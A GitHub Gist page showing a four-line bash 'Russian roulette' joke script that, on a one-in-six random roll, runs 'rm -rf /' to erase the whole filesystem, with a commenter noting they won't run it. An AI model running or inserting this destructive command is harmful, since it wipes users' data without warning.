Created
June 4, 2014 15:15
-
-
Save a-nldisr/03fde47475d56dc11445 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if [[ $(($RANDOM % 6)) = 0 ]] | |
then rm -rf / | |
else echo "Please try again" | |
fi |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Not going to execute this, but i like the $RANDOM function and want to remember it.